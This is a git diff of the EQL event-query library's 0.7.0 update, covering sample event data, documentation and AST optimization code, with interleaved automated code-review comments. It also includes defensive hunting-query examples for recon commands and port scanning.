"unique_pid": 8, - "unique_ppid": 5, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\system32\\lsass.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "7554a1b82b4a222fd4cc292abd38a558", - "opcode": 3, "parent_process_name": "wininit.exe", "parent_process_path": "C:\\Windows\\System32\\wininit.exe", "pid": 536, "ppid": 424, "process_name": "lsass.exe", "process_path": "C:\\Windows\\System32\\lsass.exe", - "serial_event_id": 9, + "subtype": "create", "timestamp": 131485996520000000, - "unique_pid": 9, - "unique_ppid": 5, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\Explorer.EXE", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", - "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", - "serial_event_id": 34, + "subtype": "create", "timestamp": 131485997150000000, - "unique_pid": 34, - "unique_ppid": 0, + "user": "research\\researcher", "user_domain": "research", "user_name": "researcher" }, { "command_line": "\"C:\\Windows\\system32\\cmd.exe\" ", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", - "opcode": 3, "parent_process_name": "explorer.exe", "parent_process_path": "C:\\Windows\\explorer.exe", "pid": 2864, "ppid": 2460, "process_name": "cmd.exe", "process_path": "C:\\Windows\\System32\\cmd.exe", - "serial_event_id": 39, + "subtype": "create", "timestamp": 131491838190000000, - "unique_pid": 39, - "unique_ppid": 34, + "user": "research\\researcher", "user_domain": "research", "user_name": "researcher" } -] +] \ No newline at end of file 
diff --git a/docs/api/ast.rst b/docs/api/ast.rst index a82f245..78816f3 100644 --- a/docs/api/ast.rst +++ b/docs/api/ast.rst @@ -10,9 +10,12 @@ Abstract Syntax Tree .. autoclass:: eql.ast.EqlNode -.. autoclass:: eql.ast.AstWalker +.. autoclass:: eql.ast.Walker :members: +.. autoclass:: eql.walkers.RecursiveWalker +.. autoclass:: eql.walkers.DepthFirstWalker + .. autoclass:: eql.ast.Expression .. autoclass:: eql.ast.Literal .. autoclass:: eql.ast.TimeRange @@ -34,14 +37,14 @@ Abstract Syntax Tree .. autoclass:: eql.ast.Sequence .. autoclass:: eql.ast.PipeCommand -.. autoclass:: eql.ast.ByPipe -.. autoclass:: eql.ast.HeadPipe -.. autoclass:: eql.ast.TailPipe -.. autoclass:: eql.ast.SortPipe -.. autoclass:: eql.ast.UniquePipe -.. autoclass:: eql.ast.CountPipe -.. autoclass:: eql.ast.FilterPipe -.. autoclass:: eql.ast.UniqueCountPipe +.. autoclass:: eql.pipes.ByPipe +.. autoclass:: eql.pipes.HeadPipe +.. autoclass:: eql.pipes.TailPipe +.. autoclass:: eql.pipes.SortPipe +.. autoclass:: eql.pipes.UniquePipe +.. autoclass:: eql.pipes.CountPipe +.. autoclass:: eql.pipes.FilterPipe +.. autoclass:: eql.pipes.UniqueCountPipe .. autoclass:: eql.ast.PipedQuery .. autoclass:: eql.ast.EqlAnalytic diff --git a/docs/cli.rst b/docs/cli.rst index 384b8a1..563bfa9 100644 --- a/docs/cli.rst +++ b/docs/cli.rst 
@@ -1,12 +1,41 @@ .. include:: links.rst ====================== -Command-Line Utility +Interactive Shell ====================== -The EQL python package provides a command line interface that will stream over `JSON`_, -and output as matches are found. An input file can be provided with ``-f`` in JSON or as lines of JSON (``.jsonl``). -Lines of JSON can also be processed as streams from stdin. +The EQL python package provides an interactive shell for data exploration, +as well as commands to directly search over `JSON`_ and output matches to +the console. First install Python and then use ``pip`` to install EQL. + +.. code-block:: console + + $ pip install eql + + +For the optimal shell experience, use Python 3.6+ and install the optional dependencies for EQL: + +.. code-block:: console + + $ pip install eql[cli] + +Once the shell is installed. Run the ``eql`` command to interact with and search data sets. +Type ``help`` within the shell to get a list of commands and ``exit`` when finished. + +|asciicast| + +.. |asciicast| image:: https://asciinema.org/a/259453.svg + :target: https://asciinema.org/a/259453 + +.. note:: + + In Python 2.7, the argument parsing is a little different. Instead of running ``eql`` directly + to invoke the interactive shell, run ``eql shell``. + + +In addition, the ``query`` command within EQL will stream over `JSON`_, and +output as matches are found. An input file can be provided with ``-f`` in JSON +or as lines of JSON (``.jsonl``). Lines of JSON can also be processed as streams from stdin. .. code-block:: console diff --git a/docs/conf.py b/docs/conf.py index 4cfe091..7fbcd44 100644 --- a/docs/conf.py +++ b/docs/conf.py 
@@ -179,67 +179,9 @@ # -- Extension configuration ------------------------------------------------- - -# Write a custom lexer for EQL to integrate with Pygments and get syntax highlighting -from pygments.lexer import RegexLexer, bygroups, include -from pygments import token +from eql.highlighters import EqlLexer from sphinx.highlighting import lexers -from eql.ast import PipeCommand -from eql.functions import builtins - - -class EqlLexer(RegexLexer): - name = 'eql' - aliases = ['eql'] - filenames = ['.eql'] - - _sign = r'[\-+]' - _integer = r'\d+' - _float = r'\d*\.\d+([Ee][-+]?\d+)?' - _time_units = 's|sec\w+|m|min\w+|h|hour|hr|d|day' - _name = r'[a-zA-Z][_a-zA-Z0-9]*' - _pipe_names = set(PipeCommand.lookup.keys()) - - tokens = { - 'whitespace': [ - (r'//(\n|[\w\W]*?[^\\]\n)', token.Comment.Single), - (r'/[*][\w\W]*?[*]/', token.Comment.Multiline), - (r'/[*][\w\W]*', token.Comment.Multiline), - (r'\s+', token.Text), - ], - 'root': [ - include('whitespace'), - (r'(and|in|not|or)\b', token.Operator.Word), # Keyword.Pseudo can also work - (r'(join|sequence|until|where)\b', token.Keyword), - (r'(const)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), - (r'(macro)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), - (r'(by|of|with)\b', token.Keyword.QueryModifier), - (r'(true|false|null)\b', token.Name.Builtin), - - # built in pipes - (r'(\|)(\s*)(%s)' % '|'.join(_pipe_names), bygroups(token.Operator, token.Whitespace, token.Name.Function.Magic)), - - # built in functions - (r'(%s)(\s*\()' % '|'.join(builtins), bygroups(token.Name.Function, token.Text)), - - # all caps names - (r'[A-Z][_A-Z0-9]+\b', token.Name.Other), - (_name, token.Name), - - # time units - (r'(%s|%s)[ \t]*(%s)\b' % (_float, _integer, _time_units), token.Literal.Date), - - (_sign + '?' + _float, token.Number.Float), - (_sign + '?' 
+ _integer, token.Number.Integer), - - (r'"(\\[btnfr"\'\\]|[^\r\n"\\])*"', token.String), - (r"'(\\[btnfr'\"\\]|[^\r\n'\\])*'", token.String), - (r'\?"(\\"|[^"])*"', token.String.Regex), - (r"\?'(\\'|[^'])*'", token.String.Regex), - (r'(==|=|!=|<|<=|>=|>)', token.Operator), - (r'[()\[\],.]', token.Punctuation), - ] - } lexers['eql'] = EqlLexer(startinline=True) + diff --git a/docs/index.rst b/docs/index.rst index e81b78d..4fed9de 100644 --- a/docs/index.rst +++ b/docs/index.rst @@ -30,7 +30,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av .. code-block:: console $ eql --version - eql 0.6.3 + eql 0.7.0 From there, try a :download:`sample json file <_static/example.json>` and test it with EQL. @@ -38,7 +38,8 @@ From there, try a :download:`sample json file <_static/example.json>` and test i $ eql query -f example.json "process where process_name == 'explorer.exe'" - {"command_line": "C:\\Windows\\Explorer.EXE", "event_subtype_full": "already_running", "event_type_full": "process_event", "md5": "ac4c51eb24aa95b77f705ab159189e24", "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "serial_event_id": 34, "timestamp": 131485997150000000, "unique_pid": 34, "unique_ppid": 0, "user_domain": "research", "user_name": "researcher"} + {"command_line": "C:\\Windows\\Explorer.EXE", "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "subtype": "create", "timestamp": 131485997150000000, "user": "research\\researcher", "user_domain": "research", "user_name": "researcher"} + Next Steps @@ -58,6 +59,7 @@ Next Steps cli api/index resources + licenses License ^^^^^^^^^^ diff --git a/docs/licenses.rst b/docs/licenses.rst index 2b8028c..d05c823 100644 --- a/docs/licenses.rst +++ b/docs/licenses.rst 
@@ -1,8 +1,5 @@ ========= License ========= - -.. include:: ../LICENSE - -.. note:: -The `EQL Analytics Library `_ has an `MIT License `_ +* The Event Query Language has an `AGPLv3 `_ License. +* The `EQL Analytics Library `_ has an `MIT License `_ diff --git a/docs/query-guide/basic-syntax.rst b/docs/query-guide/basic-syntax.rst index d3f22f4..9620ae0 100644 --- a/docs/query-guide/basic-syntax.rst +++ b/docs/query-guide/basic-syntax.rst @@ -44,8 +44,8 @@ Wildcard matching Function calls .. code-block:: eql - length(field_name) concat(user_domain, "\\", user_name) + length(command_line) > 400 add(timestamp, 300) @@ -55,6 +55,20 @@ Lookups against static or dynamic values user_name in ("Administrator", "SYSTEM", "NETWORK SERVICE") process_name in ("cmd.exe", parent_process_name) +Strings +------- +Strings are represented with single quotes ``'`` or double quotes ``"``, +with special characters escaped by a single backslash. Additionally, raw strings are +represented with a leading ``?`` character before the string, which disables escape sequences +for all characters except the quote character. + +.. code-block:: eql + + "hello world" + "hello world with 'substring'" + 'example \t of \n escaped \b characters \r etc. \f' + ?"String with literal 'slash' \ characters included" + Event Relationships diff --git a/docs/query-guide/functions.rst b/docs/query-guide/functions.rst index 23dc8bc..3903d4c 100644 --- a/docs/query-guide/functions.rst +++ b/docs/query-guide/functions.rst 
@@ -40,6 +40,22 @@ math, string manipulation or more sophisticated expressions to be expressed. arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true + +.. function:: arrayCount(array, variable, expression) + + Count the number of matches in an array to an expression. + + .. code-block:: eql + + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] + + arrayCount(my_array, item, item.user == "root") // returns 1 + arrayCount(my_array, item, item.props[0].level == 1) // returns 2 + arrayCount(my_array, item, item.props[1].level == 4) // returns 0 + arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 + + .. function:: concat(...) Returns a concatenated string of all the input arguments. @@ -56,7 +72,6 @@ math, string manipulation or more sophisticated expressions to be expressed. Checks if the string ``x`` ends with the substring ``y``. - .. function:: length(s) Returns the length of a string. Non-string values return 0. diff --git a/docs/query-guide/implementation.rst b/docs/query-guide/implementation.rst index 95936f8..2c59dc5 100644 --- a/docs/query-guide/implementation.rst +++ b/docs/query-guide/implementation.rst @@ -55,7 +55,7 @@ are independently sequenced. // nothing happens, because user has an empty state 1 {id: 4, event_type: "process", user_name: "root", process_name: "hostname"} - // sequence [2, 3] now in root's state 2 + // sequence [2, 4] now in root's state 2 // root's state 1 is empty {id: 5, event_type: "process", user_name: "root", process_name: "hostname"} 
@@ -65,19 +65,18 @@ are independently sequenced. // sequence [6] created in user's state 1 {id: 7, event_type: "process", user_name: "root", process_name: "whoami"} - // sequence [6] created in root's state 1 + // sequence [7] created in root's state 1 {id: 8, event_type: "process", user_name: "user", process_name: "hostname"} // sequence [6, 8] now in user's state 2 // user's state 1 is now empty {id: 9, event_type: "process", user_name: "root", process_name: "ifconfig"} - // sequence [2, 3, 7] completes the sequence for root + // sequence [2, 4, 9] completes the sequence for root // root still has [6] in state 1 {id: 10, event_type: "process", user_name: "user", process_name: "ifconfig"} - // sequence [6, 8, 10] completes the sequence for root + // sequence [6, 8, 10] completes the sequence for user {id: 11, event_type: "process", user_name: "root", process_name: "ifconfig"} // nothing happens because root has an empty state 2 - diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index f02574a..c664a7c 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst 
@@ -127,21 +127,27 @@ Get the top five network connections that transmitted the most data ``window`` --------- The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding -window. - -Get suspicious recon commands that were executed within a 5 minute window +window. This allows pipes to function when streaming data continuously. +Find suspicious recon commands that were executed within a 5 minute window .. code-block:: eql process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") | window 5m - | unique hostname, process_name - | unique_count process_name + | unique process_name + | unique_count | filter count >= 3 +Find processes that have network connections to a single host with over 100 unique ports within a 10 second window + .. code-block:: eql + + network where destination_address in ("10.*", "172.*", "192.*") + | window 10s + | unique_count process_name, destination_port + | filter count >= 100 + .. note:: - The window buffer will emit the most recent event first, as this will provide a stream of events when using - ``unique`` pipe or ``unique_count`` pipe. However, this means when using ``filter`` pipe in the example above, - the first few events may be absent, e.g. ``filter count >= 3`` will not show the first two events in the output - results. + The window pipe will emit all events within the window buffer from the first event, meaning events will appear like + so: [[1], [1,2], [1,2,3], ...]. Therefore, it is recommended to use a combination of ``unique_count`` and + ``filter`` to only show events over a certain threshold. diff --git a/docs/resources.rst b/docs/resources.rst index 0e1bf3c..6576204 100644 --- a/docs/resources.rst +++ b/docs/resources.rst 
@@ -1,8 +1,28 @@ -========= +=========== Resources -========= +=========== -- Atomic Friday with EQL (`slides <_static/eql-crash-course.slides.html>`_) (`notebook <_static/eql-crash-course.ipynb>`_) (`pdf <_static/eql-crash-course.pdf>`_) -- Introducing Event Query Language (`blog `_) -- EQL for the Masses (`blog `_) -- Getting Started with EQL (`blog `_) + +Blogs +^^^^^ +* `EQL's Highway to Shell `__ +* `Getting Started with EQL `__ +* `EQL For the Masses `__ +* `Introducing EQL `__ + + +Presentations +^^^^^^^^^^^^^ +* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ +* BSIDES SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* Atomic Friday: `Endgame on EQL `__ + (`slides `__, + `notebook <_static/eql-crash-course.ipynb>`__) +* MITRE ATT&CKâ„¢con: `From Technique to Detection `__ + + +Additional Resources +^^^^^^^^^^^^^^^^^^^^ +* Event Query Language (`docs `__, `code `__) +* EQL Analytics Library (`docs `__, `code `__) diff --git a/eql/__init__.py b/eql/__init__.py index a73de2a..841e021 100644 --- a/eql/__init__.py +++ b/eql/__init__.py 
@@ -1,34 +1,121 @@ """Event Query Language library.""" -from .engines import PythonEngine -from .errors import EqlError, ParseError, SchemaError +from . import ast +from . import functions +from . import pipes +from .build import ( + get_engine, + get_post_processor, + get_reducer, + render_analytic, + render_analytics, + render_engine, + render_query, + +) +from .engine import PythonEngine +from .errors import ( + EqlCompileError, + EqlError, + EqlParseError, + EqlSchemaError, + EqlSemanticError, + EqlSyntaxError, + EqlTypeMismatchError, +) +from .events import Event, AnalyticOutput +from .loader import ( + load_analytic, + load_analytics, + save_analytic, + save_analytics, +) from .parser import ( + allow_enum_fields, get_preprocessor, + ignore_missing_fields, + ignore_missing_functions, + parse_analytic, + parse_analytics, parse_definitions, parse_expression, + parse_field, + parse_literal, parse_query, - parse_analytic, - parse_analytics, + strict_field_schema, +) +from .schema import Schema +from .transpilers import ( + BaseEngine, + BaseTranspiler, + NodeMethods, + TextEngine, +) +from .utils import ( + ParserConfig, + is_stateful, + load_dump, + load_extensions, + save_dump, +) +from .walkers import ( + ConfigurableWalker, + DepthFirstWalker, + RecursiveWalker, + Walker, ) -from .loader import load_analytic, load_analytics -from .schema import use_schema -from . import functions -from . 
import ast - -__version__ = '0.6.3' +__version__ = '0.7.0' __all__ = ( "__version__", + "AnalyticOutput", + "BaseEngine", + "BaseTranspiler", + "ConfigurableWalker", + "DepthFirstWalker", + "EqlCompileError", + "EqlError", + "EqlParseError", + "EqlSchemaError", + "EqlSemanticError", + "EqlSyntaxError", + "EqlTypeMismatchError", + "Event", + "NodeMethods", + "ParserConfig", "PythonEngine", - "EqlError", "ParseError", "SchemaError", + "RecursiveWalker", + "Schema", + "TextEngine", + "Walker", + "ast", + "allow_enum_fields", + "functions", + "get_engine", + "get_post_processor", "get_preprocessor", + "get_reducer", + "ignore_missing_fields", + "ignore_missing_functions", + "is_stateful", + "load_analytic", + "load_analytics", + "load_dump", + "load_extensions", + "parse_analytic", + "parse_analytics", "parse_definitions", "parse_expression", + "parse_field", + "parse_literal", "parse_query", - "parse_analytic", - "parse_analytics", - "load_analytic", - "load_analytics", - "use_schema", - "functions", - "ast", + "pipes", + "render_analytic", + "render_analytics", + "render_engine", + "render_query", + "render_query", + "save_analytic", + "save_analytics", + "save_dump", + "strict_field_schema", ) diff --git a/eql/ast.py b/eql/ast.py index af973cb..5f0a803 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -7,14 +7,14 @@ from operator import lt, le, eq, ne, ge, gt from string import Template -from eql.utils import to_unicode, is_string, is_number - +from .functions import get_function +from .signatures import SignatureMixin +from .types import STRING, BOOLEAN, NUMBER, NULL, PRIMITIVES +from .utils import to_unicode, is_string, is_number, ParserConfig __all__ = ( # base classes "BaseNode", - "AstWalker", - "Expression", "EqlNode", @@ -47,15 +47,6 @@ # pipes "PipeCommand", - "ByPipe", - "HeadPipe", - "TailPipe", - "SortPipe", - "UniquePipe", - "CountPipe", - "FilterPipe", - "UniqueCountPipe", - "WindowPipe", # full queries "PipedQuery", 
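Review bot: `"render_query"` appears twice in the new `__all__` (the two consecutive entries just before `"save_analytic"`); drop one of them, since `from eql import *` tolerates the duplicate but linters and readers of the public API list will not. The `.build` import tuple also ends with a stray blank line before the closing `)`. `use_schema`, `ParseError` and `SchemaError` disappear from the package namespace without aliases; the exception renames are covered by the changelog's "Eql prefix" entry, but the removal of `use_schema` is not listed under Removed, so either a deprecation shim or a changelog line would help callers of the 0.6 API.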
@@ -119,6 +110,10 @@ def __repr__(self): return "{}({})".format(type(self).__name__, ", ".join('{}={}'.format(name, repr(slot)) for name, slot in self.iter_slots())) + def __iter__(self): + """Iterate recursively through all nodes in the tree.""" + return Walker().iter_node(self) + def __unicode__(self): """Render the AST back as a valid EQL string.""" return self.render() 
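Review bot: Adding `__iter__` to the base node class makes every AST node iterable, so `x in node`, `list(node)` and unpacking a node now recurse through the whole subtree via `Walker().iter_node`; code that previously relied on nodes not being iterable (container checks that distinguish a node from a list, for example) could change behaviour, and that deserves a sentence in the docstring plus a unit test. The docstring should also state the traversal order and whether the node itself is yielded, e.g. `"""Iterate depth-first over this node and every node below it."""`, if that is what `iter_node` does — I cannot confirm the order from this hunk. Note that `Walker` only becomes available through the deferred import at the bottom of the module, so this method must not be invoked at class-definition time.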
@@ -132,67 +127,6 @@ def __str__(self): return unicoded -class AstWalker(object): - """Base class that provides functionality for walking abstract syntax trees of eql.BaseNode.""" - - @classmethod - def walk(cls, node, func): - """Walk the syntax tree top-down, until callback returns False. - - :param BaseNode node: Any AST node - :param (BaseNode) -> bool func: Walk function - """ - if isinstance(node, BaseNode): - if not func(node): - return - - for slot, child in node.iter_slots(): - cls.walk(child, func) - elif isinstance(node, (list, tuple)): - for child in node: - cls.walk(child, func) - elif isinstance(node, dict): - for key, child in node.items(): - cls.walk(child, func) - - def transform(self, node, func, optimize=True): - """Recursively transform the syntax tree by walking bottom-up. - - :param BaseNode node: Any AST node - :param function func: Callback function for walking with the signature - ``func(original_node, transformed_node) -> bool`` - :param bool optimize: Return an optimized copy of the AST - :rtype: BaseNode - """ - if isinstance(node, BaseNode): - cls = type(node) - args = [self.transform(child, func, optimize=optimize) for _, child in node.iter_slots()] - transformed = cls(*args) - if optimize: - transformed = transformed.optimize() - - output = func(transformed, node) # type: BaseNode - - if optimize: - return output.optimize() - return output - elif isinstance(node, (list, tuple)): - return [self.transform(child, func, optimize=optimize) for child in node] - elif isinstance(node, dict): - return {key: self.transform(child, func, optimize=optimize) for key, child in node.items()} - else: - return node - - def copy(self, node, optimize=True): - """Create a copy of an AST. 
- - :param BaseNode node: Any valid AST - :param bool optimize: Return an optimized copy of the AST - :rtype: BaseNode - """ - return self.transform(node, lambda copy, original: copy, optimize=optimize) - - # noinspection PyAbstractClass class EqlNode(BaseNode): """The base class for all nodes within the event query language.""" @@ -254,12 +188,34 @@ class Literal(Expression): __slots__ = 'value', precedence = Expression.precedence + 1 + type_hint = PRIMITIVES def __init__(self, value): """Create an EQL value from a python value.""" - assert type(self) is not Literal, "Illegal usage of Literal AST node" + if type(self) is Literal: + raise TypeError("Literal AST nodes can't be created directly. Try Literal.from_python") self.value = value + @classmethod + def find_type(cls, python_value): + """Find the corresponding AST node type for a python value.""" + if python_value is None: + return Null + elif python_value is True or python_value is False: + return Boolean + elif is_number(python_value): + return Number + elif is_string(python_value): + return String + else: + raise TypeError("Unable to convert python value to a literal.") + + @classmethod + def from_python(cls, python_value): + """Convert a python value to a literal.""" + subcls = cls.find_type(python_value) + return subcls(python_value) + def __and__(self, other): """Shortcut ANDing of Static Value nodes together.""" if isinstance(other, Literal): @@ -286,6 +242,8 @@ def __invert__(self): class Boolean(Literal): """Boolean literal.""" + type_hint = BOOLEAN + def _render(self): return 'true' if self.value else 'false' @@ -293,6 +251,8 @@ def _render(self): class Null(Literal): """Null literal.""" + type_hint = NULL + def __init__(self, value=None): """Null literal value.""" super(Null, self).__init__(None) @@ -304,6 +264,8 @@ def _render(self): class Number(Literal): """Numeric literal.""" + type_hint = NUMBER + def _render(self): return to_unicode(self.value) 
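Review bot: `Literal.find_type` raises `TypeError("Unable to convert python value to a literal.")` without saying what was rejected; including the type name, `raise TypeError("Unable to convert python value of type {} to a literal.".format(type(python_value).__name__))`, makes the failure diagnosable without echoing the value itself. The `python_value is True or python_value is False` test is deliberately placed before `is_number` because `bool` is an `int` subclass, which is worth a one-line comment (`# bool is an int subclass, so check it before is_number`) so nobody "simplifies" the order later. `from_python` could also carry a `:raises TypeError:` line since callers may want to catch it.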
@@ -323,6 +285,7 @@ class String(Literal): } reverse_patterns = {v: k for k, v in escape_patterns.items()} escape_re = r'[{}]'.format('|'.join(escape_patterns.values())) + type_hint = STRING @classmethod def escape(cls, s): @@ -410,6 +373,11 @@ def query_multiple_events(self): # type: () -> (int, Field) return self.path[0], Field(self.path[1], self.path[2:]) return 0, self + @property + def full_path(self): # type: () -> list[str] + """Get the full path for a field.""" + return [self.base] + self.path + def _render(self): text = self.base for key in self.path: 
@@ -437,21 +405,29 @@ def __init__(self, name, arguments): self.name = name self.arguments = arguments or [] + @property + def callback(self): + """Get the callback for this node.""" + return self.signature.get_callback(*self.arguments) + + @property + def signature(self): + """Get the matching function signature.""" + return get_function(self.name) + def optimize(self): """Optimize function calls that can be determined at compile time.""" - if self.name == 'wildcard': - if any(isinstance(arg, Literal) and not isinstance(arg, String) for arg in self.arguments): - return Boolean(False) - - if len(self.arguments) >= 2 and all(isinstance(arg, String) for arg in self.arguments): - source = self.arguments[0].value - regex = '|'.join('^{}$'.format(r'.*?'.join(re.escape(sequence) - for sequence in literal.value.split('*'))) - for literal in self.arguments[1:]) - return Boolean(re.match(regex, source, re.IGNORECASE) is not None) - elif self.name == 'length' and all(isinstance(arg, String) for arg in self.arguments): - return Number(len(*(arg.value for arg in self.arguments))) - return self + func = get_function(self.name) + arguments = [arg.optimize() for arg in self.arguments] + + if func and all(isinstance(arg, Literal) for arg in arguments): + try: + rv = func.run(*[arg.value for arg in arguments]) + return Literal.from_python(rv) + except NotImplementedError: + pass + + return FunctionCall(self.name, arguments) def render(self, precedence=None): """Convert wildcards back to the short hand syntax.""" 
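Review bot: The new `callback` property dereferences `self.signature.get_callback(...)` while `signature` returns `get_function(self.name)` unguarded; `optimize` in the same hunk treats a falsy `get_function` result as possible (`if func and ...`), so for an unregistered function name `callback` would fail with an `AttributeError` on `None` rather than a meaningful error. Either raise a descriptive error in `signature` when the lookup fails, or document that callers must validate the name first. Separately, `optimize` now folds any registered function over literal arguments at compile time and only swallows `NotImplementedError`; if an implementation can raise for bad literal input (a `ValueError`, say) that exception now surfaces during optimization, which may be intended but should be stated in the docstring.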
@@ -512,6 +488,14 @@ def __init__(self, left, comparator, right): self.right = right self.function = self.func_lookup[comparator] + def __invert__(self): + """Convert a comparison by flipping the operators.""" + if self.comparator == self.EQ: + return Comparison(self.left, Comparison.NE, self.right).optimize() + elif self.comparator == self.NE: + return Comparison(self.left, Comparison.EQ, self.right).optimize() + return super(Comparison, self).__invert__() + def optimize(self): """Optimize comparisons against literal values.""" if isinstance(self.left, Literal) and isinstance(self.right, Literal): @@ -534,6 +518,24 @@ def optimize(self): return self + def __or__(self, other): + """Check for one field being compared to multiple values, and switch to a set.""" + if self.comparator == Comparison.EQ and isinstance(self.right, Literal): + if isinstance(other, Comparison) and self.left == other.left and other.comparator == Comparison.EQ: + if isinstance(other.right, Literal): + return InSet(self.left, [self.right, other.right]) + elif isinstance(other, InSet) and self.left == other.expression and other.is_literal(): + container = [self.right] + container.extend(other.container) + return InSet(self.left, container) + return super(Comparison, self).__or__(other) + + def __and__(self, other): + """Check if a comparison is ANDed to a set.""" + if self.comparator == Comparison.EQ and isinstance(other, InSet) and self.left == other.expression: + return InSet(self.left, [self.right]) & other + return super(Comparison, self).__and__(other) + class InSet(Expression): """Check if the value of a field within an event matches a list of values.""" 
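Review bot: `Comparison.__or__` returns `InSet(self.left, [self.right, other.right])` and `InSet(self.left, container)` without calling `.optimize()`, whereas `InSet.__or__` later in this file returns `InSet(...).optimize()`; if `InSet.optimize` deduplicates literals (as `_get_literals` keyed by value suggests), `a == 1 or a == 1` is reduced in one path and not the other. Appending `.optimize()` to both returns keeps the two code paths consistent. `__invert__` only flips `EQ`/`NE`; a short comment on why ordering comparators are left to the base class (presumably because `not a < b` is not `a >= b` once null values are involved) would save the next reader from "completing" it.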
@@ -570,14 +572,32 @@ def _get_literals(self): return values def __and__(self, other): - """Perform an intersection between two sets for boolean OR.""" + """Perform an intersection between two sets for boolean AND.""" if isinstance(other, InSet) and self.expression == other.expression: if self.is_literal() and other.is_literal(): container1 = self._get_literals() container2 = other._get_literals() - intersection = [v for k, v in container1.items() if k in container2] - return InSet(self.expression, intersection).optimize() + reduced = [v for k, v in container1.items() if k in container2] + return InSet(self.expression, reduced).optimize() + + elif isinstance(other, Not): + if isinstance(other.term, InSet) and self.expression == other.term.expression: + # Check if one set is being subtracted from another + if self.is_literal() and other.term.is_literal(): + container1 = self._get_literals() + container2 = other.term._get_literals() + + reduced = [v for k, v in container1.items() if k not in container2] + return InSet(self.expression, reduced).optimize() + + elif isinstance(other, Comparison) and other.comparator == Comparison.EQ and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__and__(InSet(other.left, [other.right])).optimize() + + elif isinstance(other, Comparison) and other.comparator == Comparison.NE and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__and__(~ InSet(other.left, [other.right])).optimize() return super(InSet, self).__and__(other) 
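Review bot: The two `Comparison` branches go through `super(InSet, self).__and__(InSet(other.left, [other.right])).optimize()`, which constructs an `And` node only so that `And.optimize` can evaluate `InSet & InSet` and land back in the first branch of this same method; `return self & InSet(other.left, [other.right])` (and `return self & ~InSet(other.left, [other.right])` for `NE`) states the intent directly and avoids the detour. The two branches also share every condition except the comparator and could be merged into one `elif` with a single `is_literal()` check. The `Not` branch is a nice addition; a one-line comment that the `Not` case only handles literal set subtraction and otherwise falls through to the generic `And` would make that explicit.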
@@ -592,6 +612,10 @@ def __or__(self, other): union = [v for v in container.values()] return InSet(self.expression, union).optimize() + elif isinstance(other, Comparison) and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__or__(InSet(other.left, [other.right])) + return super(InSet, self).__or__(other) def split_literals(self): @@ -694,13 +718,25 @@ def __init__(self, term): """ self.term = term + def demorgans(self): + """Apply DeMorgan's law.""" + if isinstance(self, Or): + return And([~ t for t in self.terms]).optimize() + + elif isinstance(self, And): + return Or([~ t for t in self.terms]).optimize() + + else: + return ~ self.term.optimize() + def optimize(self): """Optimize NOT terms, by flattening them.""" - return ~ self.term.optimize() + optimized_term = self.term.optimize() + return ~ optimized_term def __invert__(self): """Convert ``not not X`` to X.""" - return self.term + return self.term.optimize() def render(self, precedence=None): """Convert wildcard functions back to the short hand syntax.""" @@ -719,10 +755,18 @@ class And(BaseCompound): def optimize(self): """Optimize AND terms, by flattening them.""" - node = self.terms[0] + terms = [] + current = self.terms[0] for term in self.terms[1:]: - node &= term - return node + current = current & term + if isinstance(current, And): + terms.extend(current.terms[:-1]) + current = current.terms[-1] + + if terms: + terms.append(current) + return And(terms) + return current def __and__(self, other): """Flatten multiple ``and`` terms.""" 
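Review bot: In `Not.demorgans` the `isinstance(self, Or)` and `isinstance(self, And)` checks test the `Not` node itself, so they can never be true and both branches (which would also read `self.terms`, an attribute `Not` does not have) are dead; the method always falls through to `~ self.term.optimize()`. The intent is presumably to inspect the negated term: `if isinstance(self.term, Or): return And([~ t for t in self.term.terms]).optimize()` and `elif isinstance(self.term, And): return Or([~ t for t in self.term.terms]).optimize()`. A test asserting that `not (a or b)` rewrites to `(not a) and (not b)` would pin this down.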
@@ -742,10 +786,18 @@ class Or(BaseCompound): def optimize(self): """Optimize OR terms, by flattening them.""" - node = self.terms[0] + terms = [] + current = self.terms[0] for term in self.terms[1:]: - node |= term - return node + current = current | term + if isinstance(current, Or): + terms.extend(current.terms[:-1]) + current = current.terms[-1] + + if terms: + terms.append(current) + return Or(terms) + return current def __or__(self, other): """Flatten multiple ``or`` terms.""" 
